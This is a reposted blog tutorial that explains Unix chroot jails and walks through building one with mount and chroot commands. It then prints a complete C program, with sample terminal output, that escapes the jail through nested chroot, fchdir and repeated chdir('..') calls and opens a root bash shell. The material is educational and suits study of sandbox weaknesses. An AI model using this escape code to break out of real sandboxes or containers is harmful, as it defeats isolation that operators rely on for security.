chroot jail: creation and breaking out

最新推荐文章于 2024-07-10 09:15:55 发布
最新推荐文章于 2024-07-10 09:15:55 发布
阅读量96 收藏 2
点赞数
文章标签: python shell 开发工具
原文链接:https://my.oschina.net/u/158589/blog/113399
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

This article introduces the concept of the chroot jail, presents a simple method of how to create one and a simple method of how to breaking one.

The concept of chroot jail

chroot() is a Unix system call that is often used to provide an additional layer of security when untrusted programs are run. The kernel on Unix varients which support chroot()maintain a note of the root directory each process on the system has. Generally this is "/", but the chroot() system call can change this. When chroot()is successfully called, the calling process has its idea of the root directory changed to the directory given as the argument to chroot(). For example after the following line of code, the process would see the directory "/foo/bar" as its root directory. 

chdir("/foo/bar");

chroot("/foo/bar");


How to create a chroot jail

One thing should be noted here. chroot command in Linux is not the same as the chroot() system call. By default, chroot command will execute the same shell as the current shell when changing root directory. And if it fails to execute the shell, the command fails and the root directory is not changed.

So in order to properly create a chroot jail using chroot command, we need to set up some basic environment first. This includes the API filesystems (proc, sys, dev) and the shell binary and libraries it refers. 

mkdir /foo/bar
cd /foo/bar
# copy /bin/sh and the libraries it refers to /foo/bar/bin and /foo/bar/lib
# use ldd command to see which libraries /bin/sh refers to.

mount -t proc proc ./proc
mount -t sysfs sys ./sys
mount -o bind /dev/ ./dev
chroot .

After these steps, a chroot jail is created. Try 'bash' command and it is expected to fail as there's no /bin/bash in the current root directory.

How to break out of a chroot jail

chroot actually does nothing more than changing an ingredient in path resolution. So it is possible to break out of the chroot jail. The key is to use relative path instead of absolute path.

For a user to break out of a chroot jail, he must have access to:

1. C compiler or a perl/python interpreter

2. security holes to gain root access

Following is a sample code in C which show how to break out of a chroot jail. 

/* This program breaks a chroot jail and execute a bash interpreter. */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

#define TEMP_DIR "foo"

int main() {
        printf("Breaking out of a chroot jail!\n");
        int i;
        int dir_fd;
        struct stat sbuf;
        /* First we create the temporary directory if it doesn't exit. */
        if (stat(TEMP_DIR, &sbuf)<0) {
                if (errno == ENOENT) {
                        if (mkdir(TEMP_DIR, 0755)<0) {
                                fprintf(stderr, "Failed to create %s - %s\n",
                                        TEMP_DIR, strerror(errno));
                                exit(1);
                        }
                } else {
                        fprintf(stderr, "Failed to stat %s - %s\n",
                                TEMP_DIR, strerror(errno));
                        exit(1);
                }
        } else if (!S_ISDIR(sbuf.st_mode)) {
                fprintf(stderr, "Error - %s is not a directory!\n", TEMP_DIR);
                exit(1);
        }
        /* open the current working directory */
        if ((dir_fd=open(".", O_RDONLY))<0) {
                fprintf(stderr, "Failed to open \".\" for reading - %s\n",
                        strerror(errno));
                exit(1);
        }
        /* chroot to the temporary directory. This ensure chdir("..") has
           real effect and can reach the real root directory. */
        if (chroot(TEMP_DIR)<0) {
                fprintf(stderr, "Failed to chroot to %s - %s\n", TEMP_DIR,
                        strerror(errno));
                exit(1);
        }
        /* Partially break out of the chroot jail by doing an fchdir()
           This only partially breaks out of the chroot() jail since whilst
           our current working directory is outside the chroot jail, our
           root directory is still within it. Thus anything which refers to
           "/" will refer to files under the chroot point.
        */
        if (fchdir(dir_fd)<0) {
                fprintf(stderr, "Failed to fchdir - %s\n",
                        strerror(errno));
                exit(1);
        }
        close(dir_fd);
        /* Completely break out the chroot jail by recursing up the directory
           tree and doing a chroot to the current working directory (which will
           be the real "/" at that point). We do this by chdir("..") lots of
           times.
        */
        for (i=0; i<1024; i++) {
                chdir("..");
        }
        chroot(".");
        /* exec a bash in interactive mode */
        if (execl("/bin/bash", "-i", NULL)<0) {
                fprintf(stderr, "Failed to exec - %s\n", strerror(errno));
                exit(1);
        }
        return 0;
}

Running the compiled target in the chroot jail environment:

root@qemux86:~/test-chroot# chroot .
I have no name!@qemux86:/# ls   
bin  break.out    dev  lib  proc    sys
I have no name!@qemux86:/# ./break.out
Breaking out of a chroot jail!
root@qemux86:/# ls
bin   dev  home  lost+found  mnt  proc    sbin  tmp  var
boot  etc  lib     media         opt  run    sys   usr

转载于:https://my.oschina.net/u/158589/blog/113399

weixin_34293059
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Chroot相关
寻找自我,挑战自我!
11-25 3844
Chroot相关 一:定义 chroot,即 change root directory (更改 root 目录)。在 linux 系统中,系统默认的目录结构都是以 `/`,即是以根 (root) 开始的。而在使用 chroot 之后,系统的目录结构将以指定的位置作为 `/` 位置。 二:背景 以前,Unix/Linux上的daemon都是以root权限启动的。当时,这似乎是一件理所当然的
Creation of chroot Jail Without Changing Working Directory(在不更改工作目录的情况下创建chroot隔离区)
plstudio1的博客
04-13 230
ID: 243 类型:变量 结构:简单 状态:草稿 描述 程序使用chroot()系统调用创建隔离区,但之后不会更改工作目录。这并不妨碍访问监狱外的文件。 扩展描述 不正确使用chroot()可以让攻击者从chroot隔离区逃脱。chroot()函数调用不会更改进程的当前工作目录,因此调用chroot()后,相对路径仍可能引用chro...
chrootjail
weixin_33946605的博客
08-10 113
所谓“监牢”就是指通过chroot机制来更改某个进程所能看到的根文件夹,即将某进程限制在指定文件夹中,保证该进程仅仅能对该文件夹及其子文件夹的文件有所动作,从而保证整个server的安全。     创建chroot“监牢”     曾经,Unix/Linux上的daemon都是以root权限启动的。当时,这似乎是一件理所当然的事情,由于像Apache这种server软件须要绑定到“众所周...
设置Chroot Jail
xin_wen的专栏
04-21 1033
<br />出于安全性的考虑,Linux内核引入了chroot机制。<br /> <br />Jail需要下载安装:<br />http://www.jmcresearch.com/static/dwn/projects/jail/jail.tar.gz<br />#tar xzvf jail.tar.gz <br />#cd jail/src<br />修改Makefile设定安装路径等<br />#make && make install<br /> <br />创建Chroot目录<br />#mkd
Ubuntu 让用户获得root权限(附修复I have no name !;sudo: unknown uid 1000: who are you?)
山沐风
04-23 6756
修复:修改/etc/passwd 文件,把用户ID修改为 0,会报错:I have no name !;sudo: unknown uid 1000: who are you?重启长按shift,进入recovery mode,选择root shellmount -o rw,remount / vim /etc/passwd 改回去修改/etc/sudoers 文件vim /etc/sudoers
ant部署详解
阿义的专栏
07-23 1702
【Java】Ant关于ant的配置环境变量是首先必须的 首先到 http://ant.apache.org/bindownload.cgi这里去下载ant的压缩包,上面有linux和windows专用的,我这里下的是windows系统下用的.把下在的压缩包解压放在任意目录下然后配
ansible-role-ssh-chroot-jail:Ansible角色-SSH chroot监狱配置
01-31
`ansible-role-ssh-chroot-jail` 是一个专门为 Ansible 设计的角色,它的目的是帮助用户轻松地配置 SSH chroot 监狱。这个角色可以自动处理创建 chroot 环境、配置 SSH 服务以及管理相关用户的所有步骤,确保安全性...
linux-chroot-jail:为 ssh、sftp 和 vsftp 监禁 Linux 用户的脚本
07-11
linux-chroot-监狱用于 ssh、sftp 和 vsftp 监禁 Linux 用户的脚本监狱用户.sh jailuser.sh 此脚本会在指定用户此后登录服务器时强制执行监禁的 ssh 会话。 用户仅限于$APPS 中指定的命令列表。 它应该适用于大多数 ...
chroot2go:Linux chroot的ENV-开源
04-28
chroot()和chroot是美好的事物,通常被视为许多任务的解决方案。 该项目允许您下载为各种发行版准备的chroot。 只需下载并解压缩,它们就可以用于任何[或至少许多]目的。
build-chroot:用于跨平台构建的QEMUchroot构建环境
01-31
【标题】:“build-chroot:基于QEMU的跨平台构建工具” 在IT行业中,构建环境是软件开发过程中的重要组成部分,尤其是对于跨平台项目来说。`build-chroot` 是一个专为实现跨平台构建而设计的工具,它利用了QEMU...
jail-shellJail-shell是一种Linux安全工具,主要使用chroot,名称空间技术,限制用户执行特定命令以及访问单独目录
02-05
通过创建一个"chroot jail",我们可以限制用户的视图和操作范围,让他们无法访问到chroot环境之外的系统资源。这对于提供Web服务、邮件服务等需要多个用户共享服务器的场景特别有用,可以有效防止一个用户的错误或...
Linux系统故障诊断 - 启动文件丢失之后如何找回
砚墨
07-24 361
问题描述:客户反馈系统无法远程登录,实际系统启动本身就有问题。 1.首先挂盘后 chroot 报的 ihave no name 这本身就是个坑,说明系统内缺少了文件导致异常。 2.使用strace跟踪一下chroot的过程,看下丢失的文件 strace -F -ff -t -tt -s 256 -o ch.out chroot /mnt grep -i "no such" ch.out.pid |grep "so" 3. 查看对应文件的关系(如图) 4. 确认系统上丢失了最终的 libnss_fi
chroot 命令小记
weixin_33885253的博客
04-17 375
什么是 chroot chroot 最早是作为系统调用引入 1979 年的 Unix V7 系统,目的是为了将当前进程及其子进程的 root 目录重定向到某个指定目录。1982 年,chroot 功能被加入到 BSD 中,后经 20 多年,FreeBSD 团队引入虚拟化技术的概念,在原本的 chroot 机制上,开发了新的 jail 机制。 简单来说:一个正在运行的进程经过 chroot 操作后,...
Unix系统环境中“I have no name!”用户名问题处理
weixin_34060299的博客
12-08 3358
最近一段有接到一些程序员反馈说在连接服务器的时候用户名不显示,而是显示“I have no name!”[Ihavenoname!@localhost~]$,这个问题在当时听了后也感觉有点滑稽,于是上网找了下看,一看才知道是/etc/passwd文件的权限设置有问题,于是自己就去看了下果然,文件的权限是600其他普通用户没有读取的权限,这样系统的uid就无法获...
chroot jail下运行tomcat
星星的技术专栏
08-16 2356
chroot命令格式chroot (1)建立chroot目录mkdir /usr/local/chroot1cd /usr/local/chroot1以下所有的路径是相对于/usr/local/chroot1(2)建立相关文件夹,并赋于权限mkdir -p lib etc tmp dev usrchmod 755 etc dev usrchmod 1777 tmpcp /etc/hosts etc/hosts(3)复制jdk到相应目录mkdir usr/jdkcp -R /usr/local/jdk1.6.
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
最新发布
专注于全栈开发领域
07-10 613
Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1731
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
pandas,dataframe使用笔记
分享计算机视觉,C++,嵌入式等知识。
07-05 504
dataframe属于pandas。
chroot: failed to run command
03-16
很抱歉,我不了解这个命令的具体含义,所以无法回答你的问题。这个错误提示是关于 Linux 系统中的 chroot 命令的错误。chroot 命令可以用来改变当前进程的根目录,从而限制进程的访问范围。当你在使用 chroot 命令时,如果提示 "chroot: failed to run command",那么可能是以下原因之一: 1. 执行 chroot 命令的用户没有足够的权限; 2. chroot 命令中指定的根目录不存在; 3. chroot 命令中指定的命令不存在或不可执行。 你可以尝试使用管理员权限来执行 chroot 命令,检查根目录和命令是否存在并可执行。如果问题仍然存在,你可以提供更多详细信息,以便更准确地解决该问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值